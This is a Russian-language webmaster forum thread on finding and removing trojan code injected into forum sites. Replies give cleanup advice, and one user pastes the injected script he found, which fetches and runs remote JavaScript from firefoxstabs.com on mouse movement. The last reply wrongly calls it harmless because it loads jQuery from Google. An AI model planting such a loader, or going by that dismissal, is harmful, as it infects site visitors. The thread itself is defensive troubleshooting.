Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[DK7]

Уже и пароли на всё сменил, не помогает.

Пока вирус на компе, меняй пароли, не меняй - все одно.
ФТП доступ только у вас?

[max755]

ФТП доступ только у вас?

Надеюсь, что только у меня.

Пока вирус на компе, меняй пароли, не меняй - все одно.

Сейчас провожу повторную проверку антивирусом.

[DK7]

Тут могут быть сотни нюансов. Вирус может быть где угодно, на флешке и постоянно инфицировать компьютер, а может быть сам хостер инфицирован.
Пользуйтесь простой штукой, которая однако очень помогает.
Когда будете сохранять пароль в программу для доступа к фтп, то вводите на 1 лишний символ в конце больше. При залогинивании , программа напишет что пароль неверен. И попросит заново ввести его. Бекспейсом забиваете последний символ и спокойно заходите. Червь же окажется в пролете.

[Sheer]

Я уже проверял и Куреитом и Касперским, AVZ и HJT

Тогда ставь Аваст и после установки запланируй "Проверку во время загрузки"

Добавлено спустя 2 минуты 59 секунд:

HJT - ничего...

Выложи лог HJT

[AntikMan]

Помогите убрать Trojan Downloader.HackLoad.AG

У меня стоит еще 2.0.x версия форума. (не знаю, как уточнить, доступа в админку нет из-за активности антивиря, отключение его что-то не помогло)
Удалил подозрительную картинку картинку, выкачал с фтп все файлы и проверил НОДом, ничего не нашлось. Ифреймов подозрительных не видно.
Как обезвредить?
Спасибо

Код: Выделить всё

clubcaptiva.ru/forum/

[Alek$]

AntikMan
на каких страницах ругается антивирь?

[AntikMan]

на всех, на форум не зайти

[Alek$]

AntikMan
что у вас за антивирь? И еще сделайте на всякий случай скриншот его ругани, возможно это поможет разобраться, где засел гад.

[Петрович]

AntikMan, ведь тебе ответил в твоей предыдущей теме.
Какая точно стоит версия форума, какие моды установлены?
Вредоносный код обычно прописан в index.php, в файлах шаблона *.tpl (main.tpl). Код содержится в тегах <iframe>, <script>, иногда <script src=\...> в базе данных.
В папке с картинками возможно находятся shell'ы (файлы php), которые закодированы различными функциями. Смотреть и проверять нужно все.

[kusto]

ОТВЕТ:
- меняем ВСЕ пароли


http://virusinfo.info/pravila.html
пароли на что?

[Sheer]

пароли на что?

К базе и FTP.

[kusto]

наконец-то нашел.. по ходу такой вот код:

Код: Выделить всё

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>

может кому интересно будет

всем сапсибо за содействие

[MAzZY]

Уверены?

[Alek$]

MAzZY
вообще, довольно подозрительный код. Но не факт, что кроме него ничего нет.

[Айдар]

Alek$, этот код ссылается на сайт гугла. Вряд ли Гугл распространяет вирусы...